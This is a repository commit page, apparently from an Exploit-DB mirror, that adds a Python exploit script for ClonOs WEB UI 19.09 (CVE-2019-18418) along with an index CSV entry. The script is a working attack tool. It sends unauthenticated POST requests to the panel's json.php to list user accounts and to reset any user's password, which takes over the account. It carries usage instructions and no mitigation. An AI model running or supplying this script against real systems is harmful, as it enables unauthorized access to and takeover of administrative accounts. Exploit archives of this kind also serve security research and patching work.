bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-10-26

Browse source 
1 changes to exploits/shellcodes

ClonOs WEB UI 19.09 - Improper Access Control
This commit is contained in:
Offensive Security 2019-10-26 05:01:41 +00:00
parent 52e6461f47
commit bc814a8404
2 changed files with 45 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

44
exploits/php/webapps/47544.py Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: ClonOs WEB UI 19.09 - Improper Access Control
# Date: 2019-10-19
# Exploit Author: İbrahim Hakan Şeker
# Vendor Homepage: https://clonos.tekroutine.com/
# Software Link: https://github.com/clonos/control-pane
# Version: 19.09
# Tested on: ClonOs
# CVE : 2019-18418
import requests
from bs4 import BeautifulSoup
import sys
def getUser(host):
reg=r'\"'
r1 = requests.post(host+"/json.php",data={"mode":"getJsonPage","path":"/users/","hash":"","db_path":""},headers={"X-Requested-With":"XMLHttpRequest"})
r1_source = BeautifulSoup(r1.content,"lxml")
for k in r1_source.findAll("tr"):
for i in k.findAll("td")[0]:
print(f"[+]User Found: {i} User id: {k.get('id').replace(reg,'')}")
def changePassword(host,user,password,id):
data={
"mode":"usersEdit",
"path":"/users/",
"hash":"",
"db_path":"",
"form_data[username]":f"{user}",
"form_data[password]":f"{password}",
"form_data[password1]":f"{password}",
"form_data[first_name]":"",
"form_data[last_name]":"",
"form_data[actuser]":"on",
"form_data[user_id]": int(id)
}
r2=requests.post(host,data=data,headers={"X-Requested-With":"XMLHttpRequest"})
if r2.status_code==200:print("[+]OK")
else:print("[-]Fail")
if __name__=="__main__":
if len(sys.argv)>1:
if "getUser" in sys.argv[1]:getUser(sys.argv[2])
elif "changePassword" in sys.argv[1]:changePassword(sys.argv[2],sys.argv[3],sys.argv[4],sys.argv[5])
else:print("Fail parameter")
else:print("Usage: exploit.py getUser [http://ip_adres]\nexploit.py changePassword [http://ip_adres] [username] [new_password] [user_id]")

1
files_exploits.csv
View file

@ -41862,3 +41862,4 @@ id,file,description,date,author,type,platform,port
47540,exploits/php/webapps/47540.txt,"Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php, 47540,exploits/php/webapps/47540.txt,"Wordpress Sliced Invoices 3.8.2 - 'post' SQL Injection",2019-10-24,"Lucian Ioan Nitescu",webapps,php,
47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware, 47541,exploits/hardware/webapps/47541.txt,"AUO SunVeillance Monitoring System 1.1.9e - Incorrect Access Control",2019-10-24,Luca.Chiou,webapps,hardware,
47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware, 47542,exploits/hardware/webapps/47542.txt,"AUO SunVeillance Monitoring System 1.1.9e - 'MailAdd' SQL Injection",2019-10-24,Luca.Chiou,webapps,hardware,
47544,exploits/php/webapps/47544.py,"ClonOs WEB UI 19.09 - Improper Access Control",2019-10-25,"İbrahim Hakan Şeker",webapps,php,

Can't render this file because it is too large.